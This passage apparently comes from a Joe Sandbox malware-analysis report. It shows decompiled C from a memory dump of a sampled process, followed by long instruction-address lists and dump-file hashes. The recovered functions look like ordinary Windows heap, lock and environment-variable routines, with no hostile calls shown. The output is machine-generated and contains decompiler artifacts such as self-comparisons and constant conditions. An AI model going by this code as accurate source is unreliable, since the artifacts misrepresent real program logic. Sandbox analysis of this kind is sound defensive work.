																if(_t426 != _t426) {
																	continue;
																}
																_t390 =  *_t460;
																_v48 = _t390;
																_t320 = 0;
																do {
																	_t280 = _t390 + ((( *(_t390 + 0x5e) & 0x0000ffff) + _t320 & 0x0000000f) + 2) * 4;
																	_t427 =  *_t280;
																	_v28 = _t280;
																	if(_t427 != 0) {
																		if(( *(_t427 + 0x1c) & 0x00000001) != 0) {
																			goto L56;
																		}
																		asm("lock cmpxchg [edi], ecx");
																		_t438 = _v64;
																		if(_t427 == _t427) {
																			_t321 = 0xfffffffd;
																			_t286 =  *(_t427 + 0x1c);
																			do {
																				asm("lock cmpxchg [esi], ecx");
																			} while ((_t286 & _t321) != 0);
																			if(_t286 != 2) {
																				goto L60;
																			}
																			_t393 =  *((intOrPtr*)( *_t427));
																			 *_t427 = 0;
																			_t429 = _t427 + 0x20;
																			L59:
																			E1D7520E0(_t393, _t429);
																			goto L60;
																		}
																		L55:
																		_t390 = _v48;
																		goto L56;
																	}
																	asm("lock cmpxchg [edx], ecx");
																	if(0 == 0) {
																		goto L60;
																	}
																	goto L55;
																	L56:
																	_t320 = _t320 + 1;
																} while (_t320 < 0x10);
																_t393 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t460)) + 0xc)) + 0x3c0 + ( *( *_t460 + 0x5c) & 0x0000ffff) * 4)) + 0x48;
																L58:
																_t99 = _t460 + 0x20; // 0x20
																_t429 = _t99;
																goto L59;
															}
															goto L60;
														}
														_t393 =  *((intOrPtr*)( *_t460));
														 *_t460 = 0;
														goto L58;
													} else {
														goto L74;
													}
												}
												_t59 = _t438 + 8; // 0x8
												_t432 = E1D7CE9F6(_t59);
												if(_t432 == 0) {
													goto L36;
												}
												do {
													_t400 =  *(_t432 - 4);
													_t432 =  *_t432;
													asm("btr [eax], edi");
													_v48 = _v48 + 1;
													_v52 = _t400 >> 0x00000008 & 0x0000ffff;
												} while (_t432 != 0);
												_t455 = _v28;
												_t438 = _v64;
												_t307 = _v52;
												goto L36;
											}
											_t53 = _t306 + 8; // 0x8
											_t417 = _t53;
											_t54 = _t438 + 8; // 0x8
											_t364 = _t54;
											goto L30;
										}
										L26:
										_t412 = _t412 + 1;
										if(_t412 <= _v20) {
											_t44 = _t438 + 0x10; // 0x10
											_t227 = _t44;
											_t455 =  *_t227;
											_v28 = _t455;
											if((_t455 >> 0x00000010 & 0x00008000) != 0) {
												goto L26;
											}
											goto L25;
										}
										_t455 = _t455 | 0xffffffff;
										_v28 = _t455;
										goto L28;
									}
								} else {
									_t410 =  *(_t454 + 0xc);
									_push(0);
									_push(0);
									_push(0);
									goto L93;
								}
							}
							L98:
							_t325 = _t325 + 1;
							_v60 = _t325;
						} while (_t325 < _v44);
						_t324 = 1;
						goto L100;
					}
					L2:
					_v44 = _t324;
					goto L5;
					L100:
					_t405 = _t405 + 1;
					_v40 = _t405;
				} while (_t405 < 0x81);
				_t166 = _t435 + 0x38; // 0x38
				_t303 = _t166;
				_v48 = 0xc;
				_v44 = _t303;
				do {
					_t450 = 0;
					_t197 = E1D7CE9F6(_t303);
					_t436 = _t197;
					if(_t436 == 0) {
						goto L115;
					}
					_t305 = _v32;
					do {
						_t406 = _t436;
						_t436 =  *_t436;
						_v40 = _t406;
						_t201 = 1 <<  *(_t406 + 8);
						if(1 > 0x78000) {
							_t201 = 0x78000;
						}
						_t333 = ( *(_t406 + 0xa) & 0x0000ffff) + _t201;
						_v36 = _v36 + _t333;
						_v28 = _t333;
						E1D73DD43( *((intOrPtr*)(_t305 + 0xc)), _t406, _t333);
						_t450 = _t450 + 1;
						if(E1D753C40() == 0) {
							_t197 = 0x7ffe0380;
						} else {
							_t197 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t197 != 0) {
							_t197 =  *[fs:0x30];
							if(( *(_t197 + 0x240) & 1) != 0) {
								E1D7FF4FD(_t305,  *((intOrPtr*)(_t305 + 0xc)), _v40, _v28, 0);
								_t197 = E1D7FF582(_t305,  *((intOrPtr*)(_t305 + 0xc)), _v48, _v36, 0);
							}
						}
					} while (_t436 != 0);
					_t303 = _v44;
					if(_t450 != 0) {
						_t197 = _t303 + 8;
						asm("lock xadd [eax], esi");
					}
					L115:
					_t303 = _t303 + 0x20;
					_t189 =  &_v48;
					 *_t189 = _v48 - 1;
					_v44 = _t303;
				} while ( *_t189 != 0);
				if(_v36 != 0) {
					_t197 = _v32 + 0x2c;
					asm("lock xadd [eax], ecx");
				}
				return _t197;
			}


























































































                                                                                                                              0x1d8018e7
                                                                                                                              0x1d8018ea
                                                                                                                              0x1d8018ec
                                                                                                                              0x1d8018f0
                                                                                                                              0x1d8018f2
                                                                                                                              0x1d8018f8
                                                                                                                              0x1d8018fc
                                                                                                                              0x1d8018fd
                                                                                                                              0x1d801906
                                                                                                                              0x1d801914
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801916
                                                                                                                              0x1d80191b
                                                                                                                              0x1d801921
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801927
                                                                                                                              0x1d801927
                                                                                                                              0x1d801929
                                                                                                                              0x1d80192d
                                                                                                                              0x1d80192f
                                                                                                                              0x1d80193a
                                                                                                                              0x1d80193d
                                                                                                                              0x1d801944
                                                                                                                              0x1d801931
                                                                                                                              0x1d801931
                                                                                                                              0x1d801931
                                                                                                                              0x1d80194d
                                                                                                                              0x1d801963
                                                                                                                              0x1d801968
                                                                                                                              0x1d80196c
                                                                                                                              0x1d801e30
                                                                                                                              0x1d801e32
                                                                                                                              0x1d801e32
                                                                                                                              0x1d801e36
                                                                                                                              0x00000000
                                                                                                                              0x1d801e36
                                                                                                                              0x1d801976
                                                                                                                              0x1d80197b
                                                                                                                              0x1d801989
                                                                                                                              0x1d80198e
                                                                                                                              0x1d801e1c
                                                                                                                              0x1d801e1c
                                                                                                                              0x1d801e1d
                                                                                                                              0x1d801e1e
                                                                                                                              0x1d801e1f
                                                                                                                              0x1d801e1f
                                                                                                                              0x1d801e22
                                                                                                                              0x1d801e23
                                                                                                                              0x1d801e28
                                                                                                                              0x1d801e28
                                                                                                                              0x1d801e2a
                                                                                                                              0x1d801e2a
                                                                                                                              0x00000000
                                                                                                                              0x1d801e2a
                                                                                                                              0x1d801999
                                                                                                                              0x1d80199b
                                                                                                                              0x1d8019a1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d8019aa
                                                                                                                              0x1d8019b0
                                                                                                                              0x1d8019b5
                                                                                                                              0x1d8019b9
                                                                                                                              0x1d8019bd
                                                                                                                              0x1d8019c3
                                                                                                                              0x1d8019e6
                                                                                                                              0x1d8019fc
                                                                                                                              0x1d801a0e
                                                                                                                              0x1d8019fe
                                                                                                                              0x1d801a07
                                                                                                                              0x1d801a07
                                                                                                                              0x1d801a16
                                                                                                                              0x1d801a2c
                                                                                                                              0x1d801a31
                                                                                                                              0x1d801a31
                                                                                                                              0x1d801a40
                                                                                                                              0x1d801a47
                                                                                                                              0x1d801a4b
                                                                                                                              0x1d801a4d
                                                                                                                              0x1d801a4d
                                                                                                                              0x1d801a50
                                                                                                                              0x1d801a59
                                                                                                                              0x1d801a59
                                                                                                                              0x1d801a60
                                                                                                                              0x1d801a69
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801a6b
                                                                                                                              0x1d801a79
                                                                                                                              0x1d801a7d
                                                                                                                              0x1d801a83
                                                                                                                              0x1d801a93
                                                                                                                              0x1d801a93
                                                                                                                              0x1d801a9a
                                                                                                                              0x1d801ab0
                                                                                                                              0x1d801ab7
                                                                                                                              0x1d801ac0
                                                                                                                              0x1d801afd
                                                                                                                              0x1d801b05
                                                                                                                              0x1d801b0c
                                                                                                                              0x1d801b12
                                                                                                                              0x1d801d4b
                                                                                                                              0x1d801d4b
                                                                                                                              0x1d801d4b
                                                                                                                              0x1d801d4e
                                                                                                                              0x1d801d55
                                                                                                                              0x1d801d6c
                                                                                                                              0x1d801d6c
                                                                                                                              0x1d801d70
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801d86
                                                                                                                              0x1d801d8c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801d8e
                                                                                                                              0x1d801d92
                                                                                                                              0x1d801d96
                                                                                                                              0x1d801d98
                                                                                                                              0x1d801da7
                                                                                                                              0x1d801dab
                                                                                                                              0x1d801dc0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801dc6
                                                                                                                              0x1d801dcc
                                                                                                                              0x1d801dfa
                                                                                                                              0x1d801dfb
                                                                                                                              0x1d801dfd
                                                                                                                              0x1d801e01
                                                                                                                              0x1d801e01
                                                                                                                              0x1d801e07
                                                                                                                              0x1d801e0c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801e10
                                                                                                                              0x1d801e12
                                                                                                                              0x1d801e14
                                                                                                                              0x1d801d16
                                                                                                                              0x1d801d16
                                                                                                                              0x00000000
                                                                                                                              0x1d801d16
                                                                                                                              0x1d801dce
                                                                                                                              0x1d801dce
                                                                                                                              0x00000000
                                                                                                                              0x1d801dce
                                                                                                                              0x1d801db1
                                                                                                                              0x1d801db7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801dd2
                                                                                                                              0x1d801dd2
                                                                                                                              0x1d801dd3
                                                                                                                              0x1d801dea
                                                                                                                              0x1d801dea
                                                                                                                              0x1d801ded
                                                                                                                              0x1d801aa2
                                                                                                                              0x1d801aa2
                                                                                                                              0x00000000
                                                                                                                              0x1d801aa2
                                                                                                                              0x1d801d6c
                                                                                                                              0x00000000
                                                                                                                              0x1d801d55
                                                                                                                              0x1d801b1a
                                                                                                                              0x1d801b1d
                                                                                                                              0x1d801b26
                                                                                                                              0x1d801b39
                                                                                                                              0x1d801b3d
                                                                                                                              0x1d801b41
                                                                                                                              0x1d801b44
                                                                                                                              0x1d801b44
                                                                                                                              0x1d801b48
                                                                                                                              0x1d801c22
                                                                                                                              0x1d801c2a
                                                                                                                              0x1d801c2e
                                                                                                                              0x1d801c31
                                                                                                                              0x1d801c35
                                                                                                                              0x1d801c46
                                                                                                                              0x1d801c4a
                                                                                                                              0x1d801c5d
                                                                                                                              0x1d801c60
                                                                                                                              0x1d801c63
                                                                                                                              0x1d801c6a
                                                                                                                              0x1d801c74
                                                                                                                              0x1d801c79
                                                                                                                              0x1d801c7e
                                                                                                                              0x1d801c7f
                                                                                                                              0x1d801c81
                                                                                                                              0x1d801c81
                                                                                                                              0x1d801c8c
                                                                                                                              0x1d801c94
                                                                                                                              0x1d801c99
                                                                                                                              0x1d801c9f
                                                                                                                              0x1d801ca5
                                                                                                                              0x1d801ca5
                                                                                                                              0x1d801ca8
                                                                                                                              0x1d801cac
                                                                                                                              0x1d801cb0
                                                                                                                              0x1d801cb0
                                                                                                                              0x1d801cb2
                                                                                                                              0x1d801cb7
                                                                                                                              0x1d801cc6
                                                                                                                              0x1d801cd0
                                                                                                                              0x1d801cd0
                                                                                                                              0x1d801cdc
                                                                                                                              0x1d801ce0
                                                                                                                              0x1d801ce6
                                                                                                                              0x1d801ce9
                                                                                                                              0x1d801cef
                                                                                                                              0x1d801cf2
                                                                                                                              0x1d801cf5
                                                                                                                              0x1d801cf6
                                                                                                                              0x1d801cf8
                                                                                                                              0x1d801cfc
                                                                                                                              0x1d801cfc
                                                                                                                              0x1d801d07
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801d0f
                                                                                                                              0x1d801d0f
                                                                                                                              0x1d801d12
                                                                                                                              0x1d801d14
                                                                                                                              0x00000000
                                                                                                                              0x1d801d14
                                                                                                                              0x1d801b50
                                                                                                                              0x1d801b50
                                                                                                                              0x1d801b53
                                                                                                                              0x1d801b54
                                                                                                                              0x1d801b56
                                                                                                                              0x1d801b5a
                                                                                                                              0x1d801b5a
                                                                                                                              0x1d801b63
                                                                                                                              0x1d801b7f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801b85
                                                                                                                              0x1d801b85
                                                                                                                              0x1d801b85
                                                                                                                              0x1d801b89
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801b9f
                                                                                                                              0x1d801ba5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801ba7
                                                                                                                              0x1d801bab
                                                                                                                              0x1d801baf
                                                                                                                              0x1d801bb1
                                                                                                                              0x1d801bbd
                                                                                                                              0x1d801bc0
                                                                                                                              0x1d801bc2
                                                                                                                              0x1d801bc8
                                                                                                                              0x1d801be1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801beb
                                                                                                                              0x1d801bef
                                                                                                                              0x1d801bf5
                                                                                                                              0x1d801d25
                                                                                                                              0x1d801d26
                                                                                                                              0x1d801d28
                                                                                                                              0x1d801d2c
                                                                                                                              0x1d801d2c
                                                                                                                              0x1d801d35
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801d3d
                                                                                                                              0x1d801d41
                                                                                                                              0x1d801d43
                                                                                                                              0x1d801c1d
                                                                                                                              0x1d801c1d
                                                                                                                              0x00000000
                                                                                                                              0x1d801c1d
                                                                                                                              0x1d801bfb
                                                                                                                              0x1d801bfb
                                                                                                                              0x00000000
                                                                                                                              0x1d801bfb
                                                                                                                              0x1d801bd2
                                                                                                                              0x1d801bd8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801bff
                                                                                                                              0x1d801bff
                                                                                                                              0x1d801c00
                                                                                                                              0x1d801c17
                                                                                                                              0x1d801c1a
                                                                                                                              0x1d801c1a
                                                                                                                              0x1d801c1a
                                                                                                                              0x00000000
                                                                                                                              0x1d801c1a
                                                                                                                              0x00000000
                                                                                                                              0x1d801b85
                                                                                                                              0x1d801b67
                                                                                                                              0x1d801b6b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801b26
                                                                                                                              0x1d801ac2
                                                                                                                              0x1d801aca
                                                                                                                              0x1d801ace
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801ad4
                                                                                                                              0x1d801ad4
                                                                                                                              0x1d801ada
                                                                                                                              0x1d801ae2
                                                                                                                              0x1d801ae5
                                                                                                                              0x1d801ae9
                                                                                                                              0x1d801aed
                                                                                                                              0x1d801af1
                                                                                                                              0x1d801af5
                                                                                                                              0x1d801af9
                                                                                                                              0x00000000
                                                                                                                              0x1d801af9
                                                                                                                              0x1d801a9c
                                                                                                                              0x1d801a9c
                                                                                                                              0x1d801a9f
                                                                                                                              0x1d801a9f
                                                                                                                              0x00000000
                                                                                                                              0x1d801a9f
                                                                                                                              0x1d801a85
                                                                                                                              0x1d801a85
                                                                                                                              0x1d801a8a
                                                                                                                              0x1d801a56
                                                                                                                              0x1d801a56
                                                                                                                              0x1d801a59
                                                                                                                              0x1d801a60
                                                                                                                              0x1d801a69
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801a69
                                                                                                                              0x1d801a8c
                                                                                                                              0x1d801a8f
                                                                                                                              0x00000000
                                                                                                                              0x1d801a8f
                                                                                                                              0x1d8019e8
                                                                                                                              0x1d8019e8
                                                                                                                              0x1d8019ed
                                                                                                                              0x1d8019ee
                                                                                                                              0x1d8019ef
                                                                                                                              0x00000000
                                                                                                                              0x1d8019ef
                                                                                                                              0x1d8019e6
                                                                                                                              0x1d801e3a
                                                                                                                              0x1d801e3a
                                                                                                                              0x1d801e3b
                                                                                                                              0x1d801e3f
                                                                                                                              0x1d801e4b
                                                                                                                              0x00000000
                                                                                                                              0x1d801e4b
                                                                                                                              0x1d801908
                                                                                                                              0x1d801908
                                                                                                                              0x00000000
                                                                                                                              0x1d801e4c
                                                                                                                              0x1d801e4c
                                                                                                                              0x1d801e4d
                                                                                                                              0x1d801e51
                                                                                                                              0x1d801e5d
                                                                                                                              0x1d801e5d
                                                                                                                              0x1d801e60
                                                                                                                              0x1d801e68
                                                                                                                              0x1d801e6c
                                                                                                                              0x1d801e70
                                                                                                                              0x1d801e72
                                                                                                                              0x1d801e77
                                                                                                                              0x1d801e7b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d801e81
                                                                                                                              0x1d801e85
                                                                                                                              0x1d801e85
                                                                                                                              0x1d801e89
                                                                                                                              0x1d801e8c
                                                                                                                              0x1d801e93
                                                                                                                              0x1d801e9c
                                                                                                                              0x1d801e9e
                                                                                                                              0x1d801e9e
                                                                                                                              0x1d801ea4
                                                                                                                              0x1d801ea6
                                                                                                                              0x1d801eaa
                                                                                                                              0x1d801eb2
                                                                                                                              0x1d801eb7
                                                                                                                              0x1d801ebf
                                                                                                                              0x1d801ed1
                                                                                                                              0x1d801ec1
                                                                                                                              0x1d801eca
                                                                                                                              0x1d801eca
                                                                                                                              0x1d801ed9
                                                                                                                              0x1d801edb
                                                                                                                              0x1d801eea
                                                                                                                              0x1d801efa
                                                                                                                              0x1d801f0d
                                                                                                                              0x1d801f0d
                                                                                                                              0x1d801eea
                                                                                                                              0x1d801f12
                                                                                                                              0x1d801f1a
                                                                                                                              0x1d801f20
                                                                                                                              0x1d801f24
                                                                                                                              0x1d801f27
                                                                                                                              0x1d801f27
                                                                                                                              0x1d801f2b
                                                                                                                              0x1d801f2b
                                                                                                                              0x1d801f2e
                                                                                                                              0x1d801f2e
                                                                                                                              0x1d801f33
                                                                                                                              0x1d801f33
                                                                                                                              0x1d801f43
                                                                                                                              0x1d801f4b
                                                                                                                              0x1d801f4e
                                                                                                                              0x1d801f4e
                                                                                                                              0x1d801f58

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9a181e8ea087099b521128f5fa6cb6ea75774b1264fe2ac2f4eb11531c16c233
                                                                                                                              • Instruction ID: 49f35f4019f81dfe01ea2b859f4e12a6c62ef18448a9150df8053efb30816989
                                                                                                                              • Opcode Fuzzy Hash: 9a181e8ea087099b521128f5fa6cb6ea75774b1264fe2ac2f4eb11531c16c233
                                                                                                                              • Instruction Fuzzy Hash: BC2271356043529FC719CF18C890A2AB3E1FF89724F558A6DF99ACB351D730E846CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D74F870 Relevance: .4, Instructions: 423COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 98%
                                                                                                                              			E1D74F870(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, signed int* _a24) {
				signed short _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				signed short _v36;
				signed short _v40;
				signed int* _v44;
				signed short _v48;
				signed short _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed short* _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t156;
				signed int _t161;
				intOrPtr _t163;
				signed int _t164;
				signed short _t166;
				signed int _t168;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				intOrPtr _t179;
				signed int _t181;
				signed int _t187;
				signed short _t189;
				signed short _t191;
				signed int _t198;
				signed short _t211;
				signed short _t213;
				signed int _t217;
				signed short _t225;
				signed int _t228;
				signed int _t232;
				void* _t233;
				signed short _t234;
				signed int _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed short* _t241;
				signed int _t243;
				signed int _t248;
				signed short _t249;
				signed int _t252;
				signed int* _t253;
				signed short _t254;
				signed int _t255;
				signed int _t258;
				signed int _t270;
				intOrPtr _t272;
				signed short _t275;
				signed int* _t280;
				signed int* _t281;
				signed int _t282;
				signed int _t286;
				signed int _t290;
				signed short _t293;
				signed int _t295;
				void* _t297;
				signed int _t299;
				void* _t300;
				intOrPtr _t301;
				void* _t305;

				_push(0xfffffffe);
				_push(0x1d81c108);
				_push(E1D78AD20);
				_push( *[fs:0x0]);
				_t301 = _t300 - 0x40;
				_t156 =  *0x1d83b370;
				_v12 = _v12 ^ _t156;
				_push(_t156 ^ _t299);
				 *[fs:0x0] =  &_v20;
				_v28 = _t301;
				_v52 =  *[fs:0x18];
				 *_a24 = 0;
				_t243 = _a12;
				if(_t243 == 0) {
					_t161 = 0xc0000100;
					goto L30;
				} else {
					_v8 = 0;
					_t286 = 0xc0000100;
					_v56 = 0xc0000100;
					_t290 = 4;
					while(1) {
						_v60 = _t290;
						if(_t290 == 0) {
							break;
						}
						_t242 = _t290 + _t290 * 2;
						_t305 = _t243 -  *((intOrPtr*)(0x1d7116d4 + (_t290 + _t290 * 2) * 4));
						if(_t305 > 0) {
							break;
						}
						if(_t305 == 0) {
							_t228 = E1D787AD0(_a8,  *((intOrPtr*)(0x1d7116d8 + _t242 * 4)), _t243);
							_t301 = _t301 + 0xc;
							__eflags = _t228;
							if(__eflags == 0) {
								_t291 = _a16;
								_t286 = E1D7BE372(_t242,  *((intOrPtr*)(0x1d7116dc + _t242 * 4)), _a16, _t286, _a16, __eflags, _a20, _a24);
								_v56 = _t286;
								_t243 = _a12;
								L7:
								_v32 = _t286;
								__eflags = _t286;
								if(_t286 >= 0) {
									L29:
									_v8 = 0xfffffffe;
									_t161 = _t286;
									L30:
									 *[fs:0x0] = _v20;
									return _t161;
								}
								__eflags = _t286 - 0xc0000100;
								if(_t286 != 0xc0000100) {
									goto L29;
								}
								_t232 = _a4;
								__eflags = _t232;
								if(_t232 != 0) {
									_v36 = _t232;
									__eflags =  *_t232;
									if( *_t232 == 0) {
										_t286 = 0xc0000100;
										L88:
										_v32 = _t286;
										goto L29;
									}
									_t272 =  *((intOrPtr*)(_v52 + 0x30));
									_t163 =  *((intOrPtr*)(_t272 + 0x10));
									__eflags =  *((intOrPtr*)(_t163 + 0x48)) - _t232;
									if( *((intOrPtr*)(_t163 + 0x48)) == _t232) {
										_t164 =  *(_t272 + 0x1c);
										__eflags = _t164;
										if(_t164 == 0) {
											L95:
											_t286 = E1D7BE289( &_v36, _a8, _t243, _t291, _a20, _a24);
											_v32 = _t286;
											__eflags = _t286 - 0xc0000100;
											if(_t286 != 0xc0000100) {
												goto L29;
											}
											_t166 = 1;
											_t232 = _v36;
											_t243 = _a12;
											L87:
											_t286 = E1D772458(_t232, _a8, _t243, _t291, _a20, _a24, _t166);
											goto L88;
										}
										_t168 = E1D762180(_t164);
										_t243 = _a12;
										__eflags = _t168;
										if(_t168 == 0) {
											goto L86;
										}
										goto L95;
									}
									L86:
									_t166 = 0;
									__eflags = 0;
									goto L87;
								}
								E1D74FED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								_v8 = 1;
								_t293 =  *( *((intOrPtr*)( *((intOrPtr*)(_v52 + 0x30)) + 0x10)) + 0x48);
								_v36 = _t293;
								_t248 = _a12;
								_t26 = _t248 - 1; // -1
								__eflags = _t26 - 0x13;
								if(_t26 > 0x13) {
									L26:
									_t174 = 0xc0000100;
									_t233 = _t248 + _t248;
									goto L27;
								} else {
									_t239 = _t248 * 8 - _t248;
									__eflags = _t239;
									_v72 = _t239;
									_t281 = 0x1d836388 + _t239 * 4;
									_v44 = _t281;
									_t211 = _t281 +  *(0x1d836384 + _t239 * 4) * 8;
									_v36 = _t211;
									while(1) {
										L12:
										__eflags = _t281 - _t211;
										if(_t281 >= _t211) {
											break;
										} else {
											_t286 =  *_t281;
											_t241 = _a8;
											_t213 = _t286 + _t248 * 2;
											_v48 = _t213;
											goto L14;
										}
										while(1) {
											L14:
											_v68 = _t241;
											_v64 = _t286;
											__eflags = _t286 - _t213;
											if(_t286 >= _t213) {
												break;
											}
											_t268 =  *_t286 & 0x0000ffff;
											__eflags = ( *_t286 & 0x0000ffff) - ( *_t241 & 0x0000ffff);
											if(( *_t286 & 0x0000ffff) != ( *_t241 & 0x0000ffff)) {
												_v52 = E1D74FE08(_t268) & 0x0000ffff;
												_t270 = E1D74FE08( *_t241 & 0x0000ffff) & 0x0000ffff;
												_t225 = _v52;
												_t281 = _v44;
												__eflags = _t225 - _t270;
												if(_t225 == _t270) {
													goto L16;
												}
												__eflags = (_t225 & 0x0000ffff) == _t270;
												if((_t225 & 0x0000ffff) == _t270) {
													break;
												} else {
													_t281 =  &(_t281[2]);
													_v44 = _t281;
													_t248 = _a12;
													_t211 = _v36;
													goto L12;
												}
											}
											L16:
											_t286 = _t286 + 2;
											_t241 =  &(_t241[1]);
											_t213 = _v48;
										}
										_t233 = _a12 + _a12;
										_t264 =  *_t281 + 2 + _t233;
										_t217 = _t281[1] -  *_t281 + 2 + _t233 >> 1;
										_t286 = _t217 - 1;
										_t282 = _a16;
										__eflags = _t282;
										if(_t282 == 0) {
											L78:
											 *_a24 = _t217;
											_t174 = 0xc0000023;
											L27:
											_v32 = _t174;
											__eflags = _t174 - 0xc0000100;
											if(_t174 == 0xc0000100) {
												_t175 = _a8;
												_t249 = _t233 + _t175;
												_v52 = _t249;
												while(1) {
													_v40 = _t293;
													__eflags =  *_t293;
													if( *_t293 == 0) {
														break;
													} else {
														_v48 = _t293;
														_t286 = _t175;
														goto L34;
													}
													while(1) {
														L34:
														_v76 = _t286;
														__eflags = _t286 - _t249;
														if(__eflags >= 0) {
															break;
														}
														_t191 =  *_t293 & 0x0000ffff;
														__eflags = _t191;
														if(_t191 == 0) {
															L39:
															__eflags = _t286 - _t249;
															break;
														}
														_t254 = _t191;
														_v36 = _t254;
														__eflags = _t254 - 0x61;
														if(_t254 >= 0x61) {
															__eflags = _t254 - 0x7a;
															if(_t254 > 0x7a) {
																_t236 =  *0x1d836914; // 0x7ffd0654
																__eflags = _t236;
																if(_t236 != 0) {
																	__eflags = _t254 - 0xc0;
																	if(_t254 >= 0xc0) {
																		_t254 =  *((intOrPtr*)(_t236 + (( *(_t236 + (( *(_t236 + ((_t254 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + ((_t254 & 0x0000ffff) >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t254 & 0xf)) * 2)) + _v36;
																	}
																}
															} else {
																_t254 = _t254 + 0xffffffe0;
																__eflags = _t254;
															}
															_v36 = _t254;
														}
														_t237 =  *_t286 & 0x0000ffff;
														__eflags = _t237 - 0x61;
														if(_t237 >= 0x61) {
															__eflags = _t237 - 0x7a;
															if(_t237 > 0x7a) {
																__eflags =  *0x1d836914;
																if( *0x1d836914 != 0) {
																	__eflags = _t237 - 0xc0;
																	if(_t237 >= 0xc0) {
																		_t255 =  *0x1d836914; // 0x7ffd0654
																		_t198 =  *0x1d836914; // 0x7ffd0654
																		_t258 =  *0x1d836914; // 0x7ffd0654
																		_t237 = _t237 +  *((intOrPtr*)(_t258 + (( *(_t198 + (( *(_t255 + (_t237 >> 8) * 2) & 0x0000ffff) + (_t237 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t237 & 0x0000000f)) * 2));
																		_t254 = _v36;
																	}
																}
															} else {
																_t237 = _t237 + 0xffffffe0;
															}
														}
														__eflags = _t254 - _t237;
														_t249 = _v52;
														if(_t254 == _t237) {
															_t293 = _t293 + 2;
															_v40 = _t293;
															_t286 = _t286 + 2;
															continue;
														} else {
															goto L39;
														}
													}
													if(__eflags == 0) {
														__eflags =  *_t293 - 0x3d;
														if( *_t293 != 0x3d) {
															goto L41;
														}
														_v36 = 1;
														_t275 = _v48;
														L47:
														_t234 = _t293;
														L48:
														__eflags =  *_t293;
														if( *_t293 != 0) {
															_t293 = _t293 + 2;
															_v40 = _t293;
															goto L48;
														}
														_t252 = _t234 - _t275 >> 1;
														__eflags = _t252 - 1 - 0x13;
														if(_t252 - 1 > 0x13) {
															L52:
															__eflags = _v36;
															if(_v36 != 0) {
																_t235 = _t234 + 2;
																_t295 = _t293 - _t234 + 2 >> 1;
																_t286 = _a16;
																_t179 = _a20;
																__eflags = _t286;
																if(_t286 == 0) {
																	L83:
																	 *_a24 = _t295 + 1;
																	_t181 = 0xc0000023;
																	L75:
																	_v32 = _t181;
																	goto L28;
																}
																__eflags = _t295 - _t179;
																if(_t295 >= _t179) {
																	__eflags = _t286;
																	if(_t286 != 0) {
																		__eflags = _t179 - 1;
																		if(_t179 >= 1) {
																			 *_t286 = 0;
																		}
																	}
																	goto L83;
																}
																 *_a24 = _t295;
																_t297 = _t295 + _t295;
																E1D7888C0(_t286, _t235, _t297);
																_t181 = 0;
																__eflags = 0;
																 *((short*)(_t297 + _t286)) = 0;
																goto L75;
															}
															L53:
															_t293 = _t293 + 2;
															_t249 = _v52;
															_t175 = _a8;
															continue;
														}
														_t253 = 0x1d836384 + (_t252 * 8 - _t252) * 4;
														_t187 =  *_t253;
														__eflags = _t187 - 3;
														if(_t187 < 3) {
															_t280 =  &(_t253[1]);
															while(1) {
																_v80 = _t280;
																_t286 = 4 + _t187 * 8 + _t253;
																__eflags = _t280 - _t286;
